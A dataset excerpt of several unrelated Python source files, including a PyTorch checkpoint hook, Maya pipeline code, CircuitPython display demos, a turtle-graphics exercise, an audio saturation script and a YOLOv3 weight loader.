filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_14737
|
import torch, os
from edflow.hooks.hook import Hook
from edflow.custom_logging import get_logger
from edflow.hooks.checkpoint_hooks.common import get_latest_checkpoint
class RestorePytorchModelHook(Hook):
"""Restores a PyTorch model from a checkpoint at each epoch. Can also be
used as a functor."""
def __init__(
self,
model,
checkpoint_path,
filter_cond=lambda c: True,
global_step_setter=None,
):
"""
Parameters
----------
model : torch.nn.Module
Model to initialize
checkpoint_path : str
Directory in which the checkpoints are
stored or explicit checkpoint. Ignored if used as functor.
filter_cond : Callable
A function used to filter files, to only get the checkpoints that
are wanted. Ignored if used as functor.
global_step_setter : Callable
Function, that the retrieved global step can be passed to.
"""
self.root = checkpoint_path
self.fcond = filter_cond
self.logger = get_logger(self)
self.model = model
self.global_step_setter = global_step_setter
def before_epoch(self, ep):
checkpoint = get_latest_checkpoint(self.root, self.fcond)
self(checkpoint)
def __call__(self, checkpoint):
self.model.load_state_dict(torch.load(checkpoint))
self.logger.info("Restored model from {}".format(checkpoint))
epoch, step = self.parse_checkpoint(checkpoint)
if self.global_step_setter is not None:
self.global_step_setter(step)
self.logger.info("Epoch: {}, Global step: {}".format(epoch, step))
@staticmethod
def parse_global_step(checkpoint):
return RestorePytorchModelHook.parse_checkpoint(checkpoint)[1]
@staticmethod
def parse_checkpoint(checkpoint):
e_s = os.path.basename(checkpoint).split(".")[0].split("-")
if len(e_s) > 1:
epoch = e_s[0]
step = e_s[1].split("_")[0]
else:
epoch = 0
step = e_s[0].split("_")[0]
return int(epoch), int(step)
|
the-stack_106_14738
|
import importlib
from .parameter import Parameter
from deconvtest.core.utils.utils import list_modules, is_valid_type
from deconvtest.core.utils.errors import raise_not_valid_method_error, raise_not_valid_type_error
class Module:
"""
Abstract module class
"""
def __init__(self, method: str = None, parameters: dict = None, parent_name: str = 'deconvtest.methods'):
if parameters is None:
self.parameter_values = dict()
else:
self.parameter_values = parameters
self.parent_name = parent_name
self.method = None
self.arg_spec = None
self.parameters = []
self.result = None
self.n_inputs = None
self.n_outputs = None
self.inputs = None
self.align = False
self.type_input = None
self.type_output = None
if method is not None:
self.import_method(method)
if self.arg_spec is not None:
self.add_parameters(self.arg_spec)
def list_available_methods(self):
parent_module = importlib.import_module(self.parent_name)
available_methods = list_modules(parent_module)
return available_methods
def list_available_methods_names(self):
available_methods = self.list_available_methods()
return [method[0].__name__ for method in available_methods]
def import_method(self, method):
available_methods = self.list_available_methods()
for av_method in available_methods: # find a module with a matching name
if av_method[0].__name__ == method:
self.method = av_method[0]
self.arg_spec = av_method[1]
if self.method is None: # raise an error if no matching module found
available_methods = self.list_available_methods_names()
raise_not_valid_method_error(method, self.parent_name, available_methods)
def add_parameters(self, arg_spec):
names = arg_spec.args
defaults = arg_spec.defaults
if defaults is None:
defaults = []
types = arg_spec.annotations
n_non_optional_parameters = len(names) - len(defaults)
self.parameters = []
for i in range(len(names)):
if i < n_non_optional_parameters:
optional = False
default = None
else:
optional = True
default = defaults[i - n_non_optional_parameters]
parameter_type = None
if names[i] in types.keys():
parameter_type = types[names[i]]
self.parameters.append(Parameter(name=names[i],
default_value=default,
optional=optional,
parameter_type=parameter_type))
def verify_parameters(self):
missing_param = 0
for parameter in self.parameters:
if parameter.name in self.parameter_values.keys():
if not is_valid_type(self.parameter_values[parameter.name], parameter.type):
raise_not_valid_type_error(type(self.parameter_values[parameter.name]),
parameter.name, parameter.type)
else:
# add default value if available, otherwise raise error
if parameter.optional is True:
self.parameter_values[parameter.name] = parameter.default_value
elif self.inputs is not None and len(self.inputs) > 0:
missing_param += 1
else:
raise ValueError(rf'Parameter `{parameter.name}` is mandatory, please provide a value!')
if missing_param > 0 and missing_param != len(self.inputs):
raise ValueError(rf'Number of inputs to {self.method} must be {missing_param}, '
rf'{len(self.inputs)} provided.')
def run(self, *inputs, **parameters):
self.parameter_values = parameters
self.inputs = inputs
self.verify_parameters()
self.result = self.method(*self.inputs, **self.parameter_values)
return self.result
|
the-stack_106_14739
|
from adafruit_clue import clue
import displayio
import vectorio
import adafruit_imageload
import gc
import time
display = clue.display
#
# loading two images into memory
#
bmp, palette = adafruit_imageload.load("doge_4bit.bmp")
tg = displayio.TileGrid(bmp, pixel_shader = palette)
gp = displayio.Group()
gp.append(tg)
bmp_flipped, palette_flipped = adafruit_imageload.load("doge_4bit_flipped.bmp")
tg_flipped = displayio.TileGrid(bmp_flipped, pixel_shader = palette_flipped)
gp_flipped = displayio.Group()
gp_flipped.append(tg_flipped)
while True:
display.show(gp)
display.refresh(target_frames_per_second = 30)
display.show(gp_flipped)
display.refresh(target_frames_per_second = 30)
#
# trying to load from memory, but no space!
#
bmp, palette = adafruit_imageload.load("doge_8bit.bmp")
tg = displayio.TileGrid(bmp, pixel_shader = palette)
gp = displayio.Group()
gp.append(tg)
bmp_flipped, palette_flipped = adafruit_imageload.load("doge_8bit_flipped.bmp")
tg_flipped = displayio.TileGrid(bmp_flipped, pixel_shader = palette_flipped)
gp_flipped = displayio.Group()
gp_flipped.append(tg_flipped)
while True:
display.show(gp)
display.refresh()
display.show(gp_flipped)
display.refresh()
#
# loading from disk, viewing the long load times
#
f = open('doge_24bit.bmp', 'rb')
bmp = displayio.OnDiskBitmap(f)
tg = displayio.TileGrid(bmp, pixel_shader = displayio.ColorConverter())
gp = displayio.Group()
gp.append(tg)
g = open('doge_24bit_flipped.bmp', 'rb')
bmp_flip = displayio.OnDiskBitmap(g)
tg_flip = displayio.TileGrid(bmp_flip, pixel_shader = displayio.ColorConverter())
gp_flip = displayio.Group()
gp_flip.append(tg_flip)
display.show(gp_flip)
while True:
display.show(gp)
display.refresh()
display.show(gp_flip)
display.refresh()
#
# code not talked about in the guide, but I started trying to read the headers from the biamp files! No thanks!
#
bmp = displayio.Bitmap(240, 240, 256)
with open('doge_16.bmp', 'rb') as f:
data = f.read()
header_field = data[:2]
print(header_field.decode('utf-8'))
filesize = data[2:6]
print("FILESIZE:", int.from_bytes(filesize, "little"))
pixel_loc = data[10:14]
print("DATA START:", int.from_bytes(pixel_loc, "little"))
header_size = data[14:18]
print("HEADER SIZE:",int.from_bytes(header_size, "little"))
if header_field.decode('utf-8') == 'BM':
width = data[18:22]
print("WIDTH:", int.from_bytes(width, "little"))
height = data[22:24]
print("HEIGHT:", int.from_bytes(height, "little"))
while True:
pass
#
# create a bitmap by loaading into memory
#
bmp = displayio.Bitmap(120, 120, 2)
palette = displayio.Palette(2)
palette[0] = (255,0,0)
palette[1] = (255,255,255)
for i in range(120):
for j in range(120):
if (i + j) % 8 in [0,1,2,4]:
bmp[i,j] = 1
else:
bmp[i,j] = 0
tg = displayio.TileGrid(bitmap = bmp, pixel_shader = palette)
gp = displayio.Group(x = 60, y = 60)
gp.append(tg)
display.show(gp)
while True:
pass
|
the-stack_106_14741
|
import unittest
from typing import List
import utils
# O(n) time. O(n) space. DFS.
class Solution:
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix or not matrix[0]:
return 0
height = len(matrix)
width = len(matrix[0])
max_lengths = [[0] * width for _ in range(height)]
def dfs(row, col):
max_length = max_lengths[row][col]
if max_length:
return max_length
curr = matrix[row][col]
max_length = 0
if row > 0 and matrix[row - 1][col] > curr:
max_length = max(max_length, dfs(row - 1, col))
if row + 1 < height and matrix[row + 1][col] > curr:
max_length = max(max_length, dfs(row + 1, col))
if col > 0 and matrix[row][col - 1] > curr:
max_length = max(max_length, dfs(row, col - 1))
if col + 1 < width and matrix[row][col + 1] > curr:
max_length = max(max_length, dfs(row, col + 1))
max_length += 1
max_lengths[row][col] = max_length
return max_length
return max(dfs(row, col) for row in range(height) for col in range(width))
class Test(unittest.TestCase):
def test(self):
utils.test(self, __file__, Solution)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_14744
|
"""
Demonstrates using OBJECTS via Turtle Graphics.
Concepts include:
-- CONSTRUCT an INSTANCE of a CLASS (we call such instances OBJECTS).
-- Make an object ** DO ** something by using a METHOD.
-- Reference an object's ** DATA ** by using an INSTANCE VARIABLE.
Also:
-- ASSIGNING a VALUE to a NAME (VARIABLE).
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Aaron Wilkin, their colleagues, and Chen Li.
"""
###############################################################################
#
# DONE: 1.
# Yes, that means for YOU to DO things per the following instructions:
#
# On Line 13 above, replace PUT_YOUR_NAME_HERE with your OWN name.
#
# BTW, the top block of text above forms what is called a DOC-STRING.
# It documents what this module does, in a way that exterior programs
# can make sense of. It has no other effect on this program.
#
###############################################################################
import rosegraphics as rg
###############################################################################
#
# DONE: 2.
# Allow this module to use the rosegraphics.py module by marking the
# src
# folder in this project as a "Sources Root", as follows:
#
# In the Project window (to the left), right click on the src folder,
# then select Mark Directory As ~ Sources Root.
#
# You will see that rosegraphics in the import statement above (line 28)
# is no longer marked as an error. You will do this in all projects
# that use rosegraphics, so get used to it. :)
#
# Once rosegraphics in the import statement is no longer marked as error,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
###############################################################################
#
# DONE: 3.
# Run this module. A window will pop up and Turtles will move around.
# After the Turtles stop moving,
# ** click anywhere in the window to close the window **.
#
# Then look at the code below. Raise your hand when you have questions about
# what the code is doing. Be sure that you understand the notations for:
#
# -- CONSTRUCTING an instance of a CLASS, e.g.
# rg.SimpleTurtle()
#
# -- ASSIGNING the resulting OBJECT (instance of a class) a NAME, e.g.
# natasha = rg.SimpleTurtle()
#
# -- Applying a METHOD to an object to make the object DO something, e.g.
# natasha.forward(100)
#
# -- Accessing an INSTANCE VARIABLE of an object, e.g.
# natasha.speed = 10
# boris.speed = natasha.speed
#
# After you are confident that you understand all the code below,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make and initialize) a TurtleWindow object for animation.
# The definition of a TurtleWindow is in the rg
# (shorthand for rosegraphics) module.
# -----------------------------------------------------------------------------
window = rg.TurtleWindow()
window.delay(20) # Bigger numbers mean slower animation.
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make) a SimpleTurtle object and ASSIGN a NAME to the object.
# -----------------------------------------------------------------------------
boris = rg.SimpleTurtle()
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Ask the SimpleTurtle object to do things by applying METHODs to it.
# The numbers in the parentheses are called ARGUMENTS.
# -----------------------------------------------------------------------------
boris.forward(100)
boris.left(90)
boris.forward(200)
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Construct a second SimpleTurtle,
# set its pen and speed INSTANCE VARIABLES, and ask it to do things.
# -----------------------------------------------------------------------------
natasha = rg.SimpleTurtle('turtle')
natasha.pen = rg.Pen('red', 30) # Second argument is the Pen's thickness
natasha.speed = 5 # Bigger means faster, max is usually about 10
natasha.backward(50)
natasha.right(90)
natasha.forward(125)
natasha.speed = 1 # Now slower
natasha.go_to(rg.Point(-100, 200))
###############################################################################
#
# DONE: 4.
# Add a few more lines of your own code to make one of the existing
# SimpleTurtles move some more and/or have different characteristics.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
natasha.draw_square(50)
natasha.speed = 3000
###############################################################################
#
# DONE: 5.
# The above code CONSTRUCTS two SimpleTurtle objects
# and gives those objects NAMES:
# boris natasha
#
# Add code of your own that constructs another SimpleTurtle object,
# naming it whatever you want. Names cannot have spaces or special
# characters, but they can have digits and underscores, e.g.
# this_1_has
#
# STYLE RULE: Your names should always begin with a LOWER_CASE letter.
# So mary is OK but Mary is NOT OK.
#
# Then add more code that:
# -- Constructs a Pen object,
# -- assigns your SimpleTurtle's pen to the constructed Pen object, and
# -- makes your SimpleTurtle move around a bit.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
ezrie = rg.SimpleTurtle('turtle')
ezrie.pen = rg.Pen('black', 100)
ezrie.forward(50)
###############################################################################
#
# DONE: 6.
# Ensure that no blue bars on the scrollbar-thing to the right remain.
# Run one more time to be sure that all is still OK.
#
# Then COMMIT-and-PUSH your work as before:
# 1. Select VCS from the menu bar (above).
# 2. Choose Commit from the pull-down menu that appears.
# 3. In the Commit Changes window that pops up,
# press the Commit and Push button.
# (Note: If you see only a Commit button:
# - HOVER over the Commit button
# (in the lower-right corner of the window)
# - CLICK on Commit and Push.)
#
# You can COMMIT-and-PUSH as often as you like.
# DO IT FREQUENTLY; AT LEAST once per module.
#
###############################################################################
# -----------------------------------------------------------------------------
# The next line keeps the window open until the user clicks in the window.
# Throughout this exercise, this close_on_mouse_click line
# should be the LAST line in the file. DO NOT ADD CODE BELOW THIS LINE!
# -----------------------------------------------------------------------------
window.close_on_mouse_click()
|
the-stack_106_14745
|
import os
import sys
import errno
import importlib
import contextlib
from maya import cmds, OpenMaya
import maya.utils
import maya.api.OpenMaya as om
from pyblish import api as pyblish
from . import lib, compat
from ..lib import logger, find_submodule
from .. import api
from ..tools import workfiles
from ..vendor.Qt import QtCore, QtWidgets
from ..pipeline import AVALON_CONTAINER_ID
# Backwards compatibility
load = compat.load
update = compat.update
remove = compat.remove
create = compat.create
self = sys.modules[__name__]
self._menu = "avalonmaya" # Unique name of menu
self._events = dict() # Registered Maya callbacks
self._parent = None # Main Window
self._ignore_lock = False
AVALON_CONTAINERS = ":AVALON_CONTAINERS"
IS_HEADLESS = not hasattr(cmds, "about") or cmds.about(batch=True)
def install():
"""Install Maya-specific functionality of avalon-core.
This function is called automatically on calling `api.install(maya)`.
"""
# Inherit globally set name
self._menu = api.Session["AVALON_LABEL"] + "menu"
_register_callbacks()
_register_events()
_set_project()
# Check if maya version is compatible else fix it, Maya2018 only
# Should be run regardless of batch mode
compat.install()
if not IS_HEADLESS:
_install_menu()
pyblish.register_host("mayabatch")
pyblish.register_host("mayapy")
pyblish.register_host("maya")
def _set_project():
"""Sets the maya project to the current Session's work directory.
Returns:
None
"""
workdir = api.Session["AVALON_WORKDIR"]
try:
os.makedirs(workdir)
except OSError as e:
# An already existing working directory is fine.
if e.errno == errno.EEXIST:
pass
else:
raise
cmds.workspace(workdir, openWorkspace=True)
def get_main_window():
"""Acquire Maya's main window"""
if self._parent is None:
self._parent = {
widget.objectName(): widget
for widget in QtWidgets.QApplication.topLevelWidgets()
}["MayaWindow"]
return self._parent
def uninstall():
"""Uninstall Maya-specific functionality of avalon-core.
This function is called automatically on calling `api.uninstall()`.
"""
_uninstall_menu()
pyblish.deregister_host("mayabatch")
pyblish.deregister_host("mayapy")
pyblish.deregister_host("maya")
def _install_menu():
from ..tools import (
projectmanager,
creator,
loader,
publish,
sceneinventory
)
from . import interactive
_uninstall_menu()
def deferred():
cmds.menu(self._menu,
label=api.Session["AVALON_LABEL"],
tearOff=True,
parent="MayaWindow")
# Create context menu
context_label = "{}, {}".format(
api.Session["AVALON_ASSET"],
api.Session["AVALON_TASK"]
)
cmds.menuItem(
"currentContext",
label=context_label,
parent=self._menu,
enable=False
)
cmds.setParent("..", menu=True)
cmds.menuItem(divider=True)
# Create default items
cmds.menuItem("Create...",
command=lambda *args: creator.show(parent=self._parent))
cmds.menuItem("Load...",
command=lambda *args: loader.show(parent=self._parent,
use_context=True))
cmds.menuItem("Publish...",
command=lambda *args: publish.show(parent=self._parent),
image=publish.ICON)
cmds.menuItem("Manage...",
command=lambda *args: sceneinventory.show(
parent=self._parent))
cmds.menuItem(divider=True)
cmds.menuItem("Work Files", command=launch_workfiles_app)
system = cmds.menuItem("System",
label="System",
tearOff=True,
subMenu=True,
parent=self._menu)
cmds.menuItem("Project Manager",
command=lambda *args: projectmanager.show(
parent=self._parent))
cmds.menuItem("Reinstall Avalon",
label="Reinstall Avalon",
subMenu=True,
parent=system)
cmds.menuItem("Confirm", command=reload_pipeline)
cmds.setParent(self._menu, menu=True)
cmds.menuItem("Reset Frame Range",
command=interactive.reset_frame_range)
cmds.menuItem("Reset Resolution",
command=interactive.reset_resolution)
# Allow time for uninstallation to finish.
# We use Maya's executeDeferred instead of QTimer.singleShot
# so that it only gets called after Maya UI has initialized too.
# This is crucial with Maya 2020+ which initializes without UI
# first as a QCoreApplication
maya.utils.executeDeferred(deferred)
def launch_workfiles_app(*args):
workfiles.show(
os.path.join(
cmds.workspace(query=True, rootDirectory=True),
cmds.workspace(fileRuleEntry="scene")
),
parent=self._parent
)
def reload_pipeline(*args):
"""Attempt to reload pipeline at run-time.
CAUTION: This is primarily for development and debugging purposes.
"""
api.uninstall()
for module in ("avalon.io",
"avalon.lib",
"avalon.pipeline",
"avalon.maya.commands",
"avalon.maya.interactive",
"avalon.maya.pipeline",
"avalon.maya.lib",
"avalon.tools.creator.app",
# NOTE(marcus): These have circular depenendencies
# that is preventing reloadability
# "avalon.tools.loader.delegates",
# "avalon.tools.loader.model",
# "avalon.tools.loader.widgets",
# "avalon.tools.loader.app",
# "avalon.tools.sceneinventory.model",
# "avalon.tools.sceneinventory.proxy",
# "avalon.tools.sceneinventory.app",
# "avalon.tools.projectmanager.dialogs",
# "avalon.tools.projectmanager.lib",
# "avalon.tools.projectmanager.model",
# "avalon.tools.projectmanager.style",
# "avalon.tools.projectmanager.widget",
# "avalon.tools.projectmanager.app",
"avalon.api",
"avalon.tools",
"avalon.maya"):
module = importlib.import_module(module)
reload(module)
get_main_window()
import avalon.maya
api.install(avalon.maya)
def _uninstall_menu():
# In Maya 2020+ don't use the QApplication.instance()
# during startup (userSetup.py) as it will return a
# QtCore.QCoreApplication instance which does not have
# the allWidgets method. As such, we call the staticmethod.
all_widgets = QtWidgets.QApplication.allWidgets()
widgets = dict((w.objectName(), w) for w in all_widgets)
menu = widgets.get(self._menu)
if menu:
menu.deleteLater()
del(menu)
def _update_menu_task_label():
"""Update the task label in Avalon menu to current session"""
if IS_HEADLESS:
return
object_name = "{}|currentContext".format(self._menu)
if not cmds.menuItem(object_name, query=True, exists=True):
logger.warning("Can't find menuItem: {}".format(object_name))
return
label = "{}, {}".format(api.Session["AVALON_ASSET"],
api.Session["AVALON_TASK"])
cmds.menuItem(object_name, edit=True, label=label)
def lock():
"""Lock scene
Add an invisible node to your Maya scene with the name of the
current file, indicating that this file is "locked" and cannot
be modified any further.
"""
if not cmds.objExists("lock"):
with lib.maintained_selection():
cmds.createNode("objectSet", name="lock")
cmds.addAttr("lock", ln="basename", dataType="string")
# Permanently hide from outliner
cmds.setAttr("lock.verticesOnlySet", True)
fname = cmds.file(query=True, sceneName=True)
basename = os.path.basename(fname)
cmds.setAttr("lock.basename", basename, type="string")
def unlock():
"""Permanently unlock a locked scene
Doesn't throw an error if scene is already unlocked.
"""
try:
cmds.delete("lock")
except ValueError:
pass
def is_locked():
"""Query whether current scene is locked"""
fname = cmds.file(query=True, sceneName=True)
basename = os.path.basename(fname)
if self._ignore_lock:
return False
try:
return cmds.getAttr("lock.basename") == basename
except ValueError:
return False
@contextlib.contextmanager
def lock_ignored():
"""Context manager for temporarily ignoring the lock of a scene
The purpose of this function is to enable locking a scene and
saving it with the lock still in place.
Example:
>>> with lock_ignored():
... pass # Do things without lock
"""
self._ignore_lock = True
try:
yield
finally:
self._ignore_lock = False
def containerise(name,
namespace,
nodes,
context,
loader=None,
suffix="CON"):
"""Bundle `nodes` into an assembly and imprint it with metadata
Containerisation enables a tracking of version, author and origin
for loaded assets.
Arguments:
name (str): Name of resulting assembly
namespace (str): Namespace under which to host container
nodes (list): Long names of nodes to containerise
context (dict): Asset information
loader (str, optional): Name of loader used to produce this container.
suffix (str, optional): Suffix of container, defaults to `_CON`.
Returns:
container (str): Name of container assembly
"""
container = cmds.sets(nodes, name="%s_%s_%s" % (namespace, name, suffix))
data = [
("schema", "avalon-core:container-2.0"),
("id", AVALON_CONTAINER_ID),
("name", name),
("namespace", namespace),
("loader", str(loader)),
("representation", context["representation"]["_id"]),
]
for key, value in data:
if not value:
continue
if isinstance(value, (int, float)):
cmds.addAttr(container, longName=key, attributeType="short")
cmds.setAttr(container + "." + key, value)
else:
cmds.addAttr(container, longName=key, dataType="string")
cmds.setAttr(container + "." + key, value, type="string")
main_container = cmds.ls(AVALON_CONTAINERS, type="objectSet")
if not main_container:
main_container = cmds.sets(empty=True, name=AVALON_CONTAINERS)
# Implement #399: Maya 2019+ hide AVALON_CONTAINERS on creation..
if cmds.attributeQuery("hiddenInOutliner",
node=main_container,
exists=True):
cmds.setAttr(main_container + ".hiddenInOutliner", True)
else:
main_container = main_container[0]
cmds.sets(container, addElement=main_container)
# Implement #399: Maya 2019+ hide containers in outliner
if cmds.attributeQuery("hiddenInOutliner",
node=container,
exists=True):
cmds.setAttr(container + ".hiddenInOutliner", True)
return container
def parse_container(container):
"""Return the container node's full container data.
Args:
container (str): A container node name.
Returns:
dict: The container schema data for this container node.
"""
data = lib.read(container)
# Backwards compatibility pre-schemas for containers
data["schema"] = data.get("schema", "avalon-core:container-1.0")
# Append transient data
data["objectName"] = container
return data
def _ls():
"""Yields Avalon container node names.
Used by `ls()` to retrieve the nodes and then query the full container's
data.
Yields:
str: Avalon container node name (objectSet)
"""
def _maya_iterate(iterator):
"""Helper to iterate a maya iterator"""
while not iterator.isDone():
yield iterator.thisNode()
iterator.next()
ids = {AVALON_CONTAINER_ID,
# Backwards compatibility
"pyblish.mindbender.container"}
# Iterate over all 'set' nodes in the scene to detect whether
# they have the avalon container ".id" attribute.
fn_dep = om.MFnDependencyNode()
iterator = om.MItDependencyNodes(om.MFn.kSet)
for mobject in _maya_iterate(iterator):
if mobject.apiTypeStr != "kSet":
# Only match by exact type
continue
fn_dep.setObject(mobject)
if not fn_dep.hasAttribute("id"):
continue
plug = fn_dep.findPlug("id", True)
value = plug.asString()
if value in ids:
yield fn_dep.name()
def ls():
"""Yields containers from active Maya scene
This is the host-equivalent of api.ls(), but instead of listing
assets on disk, it lists assets already loaded in Maya; once loaded
they are called 'containers'
Yields:
dict: container
"""
container_names = _ls()
has_metadata_collector = False
config_host = find_submodule(api.registered_config(), "maya")
if hasattr(config_host, "collect_container_metadata"):
has_metadata_collector = True
for container in sorted(container_names):
data = parse_container(container)
# Collect custom data if attribute is present
if has_metadata_collector:
metadata = config_host.collect_container_metadata(container)
data.update(metadata)
yield data
def update_hierarchy(containers):
"""Hierarchical container support
This is the function to support Scene Inventory to draw hierarchical
view for containers.
We need both parent and children to visualize the graph.
"""
container_names = set(_ls()) # lookup set
for container in containers:
# Find parent
parent = cmds.listSets(object=container["objectName"]) or []
for node in parent:
if node in container_names:
container["parent"] = node
break
# List children
children = cmds.ls(cmds.sets(container["objectName"], query=True),
type="objectSet")
container["children"] = [child for child in children
if child in container_names]
yield container
class Creator(api.Creator):
def process(self):
nodes = list()
with lib.undo_chunk():
if (self.options or {}).get("useSelection"):
nodes = cmds.ls(selection=True)
instance = cmds.sets(nodes, name=self.name)
lib.imprint(instance, self.data)
return instance
class Loader(api.Loader):
hosts = ["maya"]
def __init__(self, context):
super(Loader, self).__init__(context)
if self.fname:
self.fname = self.fname.replace(
api.registered_root(), "$AVALON_PROJECTS"
)
else:
logger.warning("Loader couldn't determine the filepath to load.")
def publish():
"""Shorthand to publish from within host"""
import pyblish.util
return pyblish.util.publish()
def _register_callbacks():
for handler, event in self._events.copy().items():
if event is None:
continue
try:
OpenMaya.MMessage.removeCallback(event)
self._events[handler] = None
except RuntimeError as e:
logger.info(e)
self._events[_on_scene_save] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kBeforeSave, _on_scene_save
)
self._events[_before_scene_save] = OpenMaya.MSceneMessage.addCheckCallback(
OpenMaya.MSceneMessage.kBeforeSaveCheck, _before_scene_save
)
self._events[_on_scene_new] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kAfterNew, _on_scene_new
)
self._events[_on_maya_initialized] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kMayaInitialized, _on_maya_initialized
)
self._events[_on_scene_open] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kAfterOpen, _on_scene_open
)
logger.info("Installed event handler _on_scene_save..")
logger.info("Installed event handler _before_scene_save..")
logger.info("Installed event handler _on_scene_new..")
logger.info("Installed event handler _on_maya_initialized..")
logger.info("Installed event handler _on_scene_open..")
def _register_events():
api.on("taskChanged", _on_task_changed)
logger.info("Installed event callback for 'taskChanged'..")
def _on_maya_initialized(*args):
api.emit("init", args)
if cmds.about(batch=True):
logger.warning("Running batch mode ...")
return
# Keep reference to the main Window, once a main window exists.
get_main_window()
def _on_scene_new(*args):
api.emit("new", args)
def _on_scene_save(*args):
api.emit("save", args)
def _on_scene_open(*args):
api.emit("open", args)
def _before_scene_save(return_code, client_data):
# Default to allowing the action. Registered
# callbacks can optionally set this to False
# in order to block the operation.
OpenMaya.MScriptUtil.setBool(return_code, True)
api.emit("before_save", [return_code, client_data])
def _on_task_changed(*args):
_update_menu_task_label()
workdir = api.Session["AVALON_WORKDIR"]
if os.path.exists(workdir):
logger.info("Updating Maya workspace for task change to %s", workdir)
_set_project()
# Set Maya fileDialog's start-dir to /scenes
frule_scene = cmds.workspace(fileRuleEntry="scene")
cmds.optionVar(stringValue=("browserLocationmayaBinaryscene",
workdir + "/" + frule_scene))
else:
logger.warning("Can't set project for new context because "
"path does not exist: %s", workdir)
|
the-stack_106_14746
|
import matplotlib.pyplot as plt
import numpy as np
import scipy.io.wavfile as wav
def cubicSaturation(out, gain):
#Saturate the output signal using ArcTan clipping
out = out - out*out*out/3
return out
wav_fname = 'textbookcode/Ch_03/sw440hz.wav'
fs, data = wav.read(wav_fname)
length = data.shape[0] / fs
samplelength = data.shape[0]
print(f"length = {length}s")
# Divide audio signal by max int value for signed 16 bit number
data = data/np.iinfo(np.int16).max
#Set up the time axis for the waveform
time = np.linspace(0, length, data.shape[0])
#initialize output signal
data2 = np.zeros(samplelength)
#define the gain parameter (only use values from 0 to 1)
gain = 1
#Run the data through ArcTan function
for n in range(0,samplelength):
data2[n] = cubicSaturation(data[n], gain)
#set up the graph
fig = plt.figure(figsize=(10,4), dpi=100)
ax = fig.add_axes([0.1,0.1,0.8,0.8])
#plot the original waveform
ax.plot(time, data, label="Original Audio Signal")
#plot the synthesized sine waveform
ax.plot(time, data2, label="Saturated Signal")
ax.set_xlabel("Time [s]")
ax.set_ylabel("Amplitude")
ax.legend(loc= 7)
ax.set_xlim([0,0.02])
#Normalize the audio output level to max output
amplitude = np.iinfo(np.int16).max
data2 = data2*amplitude
#Truncate any non-integer/fractional data
#If we don't do this, the wav file won't be readable
data2 = np.asarray(data2, dtype = np.int16)
#Write the data to an output file
wav.write("textbookcode/Ch_03/sw440hz_modulated.wav", 44100, data2)
plt.show()
|
the-stack_106_14748
|
import model_wrapper as mw
from get_training_input_args import get_training_input_args
from img_classifier_utils import train,test
from time_elapsed import TimeElapsed
# Start Training
in_arg = get_training_input_args()
model = mw.ModelWrapper(in_arg.arch)
model.setup_data(in_arg.data_dir)
model.augment_normalize_data()
model.load_data()
model.freeze_params()
model.create_classifier(in_arg.hidden_units)
te = TimeElapsed('Training')
train(model,in_arg.epochs,in_arg.gpu,in_arg.learning_rate)
te.stop_and_print_time_elapsed()
te = TimeElapsed('Test')
test(model,in_arg.gpu)
te.stop_and_print_time_elapsed()
model.save(in_arg.arch,in_arg.epochs,in_arg.learning_rate,in_arg.save_dir)
|
the-stack_106_14749
|
import random
from Crypto.Util.number import * # pylint: disable=unused-wildcard-import
import gmpy2
import sys
import time
a = 0xe64a5f84e2762be5
chunk_size = 64
bits = 1024
def gen_prime(bits):
s = random.getrandbits(chunk_size)
while True:
s |= 0xc000000000000001
p = 0
for _ in range(bits // chunk_size):
p = (p << chunk_size) + s
s = a * s % 2**chunk_size
if gmpy2.is_prime(p):
return p
def progressbar(sum, iteration, suffix="", prefix="", length=50):
percent = ("{0:." + str(1) + "f}").format(100 * (iteration / sum))
filledLength = int(length * iteration // sum)
bar = "█" * filledLength + '-' * (length - filledLength)
sys.stdout.write('\r%s |%s| %s%% %s' % (suffix, bar, percent, prefix))
sys.stdout.flush()
if len(sys.argv) < 3:
sys.stderr.write("Usage: <file> <iterations>\n")
sys.stderr.flush()
exit()
iterations = int(sys.argv[2])
data = []
start = time.time()
for i in range(iterations):
data.append(gen_prime(bits))
proc = int((time.time()-start)/(i+1)*(iterations-i+1))
progressbar(iterations, i+1, "Generating :", "Reaming Time: {}".format(time.strftime("%Hh %Mmin %Ss", time.gmtime(proc))))
print(time.time()-start)
with open(sys.argv[1], "w") as f:
for i in range(iterations):
f.write(hex(data[i]) + "\n")
progressbar(iterations, i+1, "Saving :")
print("\nDone")
|
the-stack_106_14750
|
import os
from absl import logging, app
import numpy as np
import tensorflow as tf
import cv2
import tensorflow_datasets as tfds
#from object_detection.utils import dataset_util
YOLOV3_LAYER_LIST = [
'yolo_darknet',
'yolo_conv_0',
'yolo_output_0',
'yolo_conv_1',
'yolo_output_1',
'yolo_conv_2',
'yolo_output_2',
]
YOLOV3_TINY_LAYER_LIST = [
'yolo_darknet',
'yolo_conv_0',
'yolo_output_0',
'yolo_conv_1',
'yolo_output_1',
]
def load_darknet_weights(model, weights_file, tiny=False):
wf = open(weights_file, 'rb')
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
if tiny:
layers = YOLOV3_TINY_LAYER_LIST
else:
layers = YOLOV3_LAYER_LIST
for layer_name in layers:
sub_model = model.get_layer(layer_name)
for i, layer in enumerate(sub_model.layers):
if not layer.name.startswith('conv2d'):
continue
batch_norm = None
if i + 1 < len(sub_model.layers) and \
sub_model.layers[i + 1].name.startswith('batch_norm'):
